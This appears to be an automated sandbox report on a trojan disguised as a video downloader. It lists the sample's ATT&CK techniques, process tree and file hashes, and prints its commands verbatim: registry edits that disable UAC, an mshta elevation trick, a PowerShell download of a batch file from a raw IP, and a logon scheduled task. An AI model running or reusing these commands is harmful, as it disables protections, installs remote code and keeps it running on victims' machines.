2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d

Analysis

max time kernel
149s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
28/09/2024, 11:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

pornhub_downloader.exe
Size

88KB
MD5

759f5a6e3daa4972d43bd4a5edbdeb11
SHA1

36f2ac66b894e4a695f983f3214aace56ffbe2ba
SHA256

2031202030b1581acb6694f7ba528431a5015c7c37a4c6bcc0e1afdbca6f120d
SHA512

f97c793e1489e09dc6867bc9fb8a8e6073e08e1019b7a6fd57efdb31099047fcef9bc7bc3a8194742d7998f075c50e5d71670711bf077da1ac801aab7d19b385
SSDEEP

1536:D7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIf+xB4O5:fq6+ouCpk2mpcWJ0r+QNTBf+LV

Score

10^/10

defense_evasion discovery evasion execution privilege_escalation trojan

Malware Config

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
21	2688	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2688	powershell.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
3568	attrib.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	pornhub_downloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000\Control Panel\International\Geo\Nation	PORNHU~1.EXE

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
4000	mshta.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pornhub_downloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PORNHU~1.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4352	schtasks.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
2688	powershell.exe
2688	powershell.exe
2408	msedge.exe
2408	msedge.exe
3908	msedge.exe
3908	msedge.exe
1808	identity_helper.exe
1808	identity_helper.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe
2156	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe
3908	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3096 wrote to memory of 4032	3096	pornhub_downloader.exe	84
PID 3096 wrote to memory of 4032	3096	pornhub_downloader.exe	84
PID 4032 wrote to memory of 4000	4032	cmd.exe	87
PID 4032 wrote to memory of 4000	4032	cmd.exe	87
PID 4000 wrote to memory of 3388	4000	mshta.exe	88
PID 4000 wrote to memory of 3388	4000	mshta.exe	88
PID 4000 wrote to memory of 3388	4000	mshta.exe	88
PID 3388 wrote to memory of 684	3388	PORNHU~1.EXE	89
PID 3388 wrote to memory of 684	3388	PORNHU~1.EXE	89
PID 684 wrote to memory of 2848	684	cmd.exe	91
PID 684 wrote to memory of 2848	684	cmd.exe	91
PID 684 wrote to memory of 2440	684	cmd.exe	92
PID 684 wrote to memory of 2440	684	cmd.exe	92
PID 684 wrote to memory of 3360	684	cmd.exe	93
PID 684 wrote to memory of 3360	684	cmd.exe	93
PID 684 wrote to memory of 5060	684	cmd.exe	94
PID 684 wrote to memory of 5060	684	cmd.exe	94
PID 5060 wrote to memory of 3532	5060	cmd.exe	95
PID 5060 wrote to memory of 3532	5060	cmd.exe	95
PID 684 wrote to memory of 3908	684	cmd.exe	96
PID 684 wrote to memory of 3908	684	cmd.exe	96
PID 684 wrote to memory of 3568	684	cmd.exe	97
PID 684 wrote to memory of 3568	684	cmd.exe	97
PID 3908 wrote to memory of 2760	3908	msedge.exe	98
PID 3908 wrote to memory of 2760	3908	msedge.exe	98
PID 684 wrote to memory of 2688	684	cmd.exe	99
PID 684 wrote to memory of 2688	684	cmd.exe	99
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100
PID 3908 wrote to memory of 2724	3908	msedge.exe	100

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3568	attrib.exe

C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe
"C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3096
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5E0E.tmp\5E0F.tmp\5E10.bat C:\Users\Admin\AppData\Local\Temp\pornhub_downloader.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4032
- - C:\Windows\system32\mshta.exe
    mshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE","goto :target","","runas",1)(window.close)
    3⤵
    - Checks computer location settings
    - Access Token Manipulation: Create Process with Token
    - Suspicious use of WriteProcessMemory
    PID:4000
  - - C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE
      "C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE" goto :target
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3388
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\61F6.tmp\61F7.tmp\61F8.bat C:\Users\Admin\AppData\Local\Temp\PORNHU~1.EXE goto :target"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:684
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2848
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:2440
      - C:\Windows\system32\reg.exe
        
        reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F
        6⤵
        UAC bypass
        
        PID:3360
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5060
        
        C:\Windows\system32\reg.exe
        
        reg query HKEY_CLASSES_ROOT\http\shell\open\command
        7⤵
        
        PID:3532
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/
        6⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0fd646f8,0x7ffd0fd64708,0x7ffd0fd64718
        7⤵
        
        PID:2760
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1956 /prefetch:2
        7⤵
        
        PID:2724
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2408
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2656 /prefetch:8
        7⤵
        
        PID:1440
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
        7⤵
        
        PID:2348
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
        7⤵
        
        PID:2592
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:1
        7⤵
        
        PID:3976
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
        7⤵
        
        PID:1104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5568 /prefetch:8
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
        7⤵
        
        PID:1456
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
        7⤵
        
        PID:3924
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4204 /prefetch:1
        7⤵
        
        PID:1776
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
        7⤵
        
        PID:4488
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,13253751722938946427,8842887632689818979,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1856 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2156
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h d:\net
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:3568
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2688
      - C:\Windows\system32\schtasks.exe
        
        SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4284

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1212

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2dc1a9f2f3f8c3cfe51bb29b078166c5

SHA1
eaf3c3dad3c8dc6f18dc3e055b415da78b704402

SHA256
dcb76fa365c2d9ee213b224a91cdd806d30b1e8652d72a22f2371124fa4479fa

SHA512
682061d9cc86a6e5d99d022da776fb554350fc95efbf29cd84c1db4e2b7161b76cd1de48335bcc3a25633079fb0bd412e4f4795ed6291c65e9bc28d95330bb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e4f80e7950cbd3bb11257d2000cb885e

SHA1
10ac643904d539042d8f7aa4a312b13ec2106035

SHA256
1184ee8d32d0edecddd93403fb888fad6b3e2a710d37335c3989cc529bc08124

SHA512
2b92c9807fdcd937e514d4e7e1cc7c2d3e3aa162099b7289ceac2feea72d1a4afbadf1c09b3075d470efadf9a9edd63e07ea7e7a98d22243e45b3d53473fa4f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
816B

MD5
3b8aae1408771ba514da9b4948f27da8

SHA1
b2213ccfa4c7ec6c2d0fe44c75b77638ebb98638

SHA256
051901fb272ac05974cf3e13982bbfb21524baf2d510ad19c08430da1f2c4984

SHA512
4a3e8155f992c72abab7962b81fbf6ae055bd2b79a5bb3f9abd0400a1e63525ec316d5c370bf79f28ef2e4a4aa6a5f6cc171549e4d08ae11aabed0f0d0b97472

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
1KB

MD5
46c7f5d449959bcec45c5b5d4c5cf6b1

SHA1
5c247ecb0124d34e5b6684c88c901d37e7e30be1

SHA256
c7da5a0f8bd179485c6948b8eda6fa39a0c557cd894dd1218ea5ebce5133e3ec

SHA512
6a19b64fadad93e398ec4881c05adc7f0d253249dc4eb063afbd254e240148e8421cf5d7c12fc90f5d4d66883ef34755ee814473705d38d20b5d36a60a51fc27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
f0ffbb8d1550aaed39ce2c85cf15c6bf

SHA1
a022baba3bcb61f681fd20a12c8848c98555c4e1

SHA256
e1ed2f98219081718e3d989a33355548913b15173562c8d6c10cdcc4b88bf950

SHA512
f5a4762197683c5311ff64596d30a426d33025adb2a977a33757f67a07f8b2ecb5be5769ae1aabc6a1bce244076eb8b8eade5c1fe6e384095a9d7009bebbf955

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
901450ef910ce5ade2cc92a5207c7032

SHA1
e6e38fde6cea0289c8c2176e57d0a8c2bd1e1620

SHA256
0c3980469ffefee509070afb9cd36de98eb08557561274c7df48a72264a930cb

SHA512
25a04c888b4398ea3db1bc92964679640fa0193c68fef948a74ff6b190a1beaa471cd1ddca5143a61ff85b0b24cb80f8de847f6b2f16b28f5b9c5216d2e10657

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
96B

MD5
f9b4be0b1d94e9caadc6ea4494dbf4fb

SHA1
d79e2a4bcee3a5ecce5bc89f8d302ceffbe97997

SHA256
9e4222c7a2c18c54bcb2460278bcdb8fe5233ba610b2e886afe7ca60cdab3d3e

SHA512
653de47cb51cf2801e8fbfb97ef0df2997c529845c3f799461230e0ddff06d8ad781d6cef4429207a78cf3120c3e63d2fbac8ec24d4883d5698d7bc5886b09b3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe57c18b.TMP

Filesize
48B

MD5
3e13cf3264eec518a5c3a53c650ff025

SHA1
4e8ad27a535a684598cad23629cd3af9dca629c4

SHA256
7f898cb091aa7ab44899c80ce3334ce9d711561778cf606154977dd1d9d26cca

SHA512
5af2a33508915c1491a23148053b38db6a9954812c79509178a283790ec3a9cd75be5f8cc6a6c869f9601cd389aa54e1684bded06015013c5008679d8bafa126

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
d77502c02bd16d961e02e5e5d9275959

SHA1
50849736acff07042159e715750e29a98fa99c00

SHA256
6ea12fb887414f90a2375bea2368cbeb36e1f6e13c11ff101c00f0054b65951a

SHA512
839d1d110187a22a1e5e2b6db39927329b8d4c6078cbc3792fed00c11d880320e9a9f6d9582eaadfe943755e0a12191cfaaf7b567e260b3ca447d2718ab891d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\5E0E.tmp\5E0F.tmp\5E10.bat

Filesize
1KB

MD5
9856d2fe29a28c54c5943c2150f7bae1

SHA1
f7532a2a79b1b6aca1c151b34fe8b1ce2c798e97

SHA256
0b6140b4764863f3263b0be87f35c9afe9a849823eccf37259bed08baa93e999

SHA512
002db693f5664f80e58bb3590f32068f611bc97d3f71324abb659dd1fd0bffe3df36379ae92ffbeabde10bd6245b3c069b56ba4d8b4608c634a2525e7a76735f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ocsefr0f.2rs.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2688-17-0x000001AFC11C0000-0x000001AFC11E2000-memory.dmp

Filesize
136KB

Download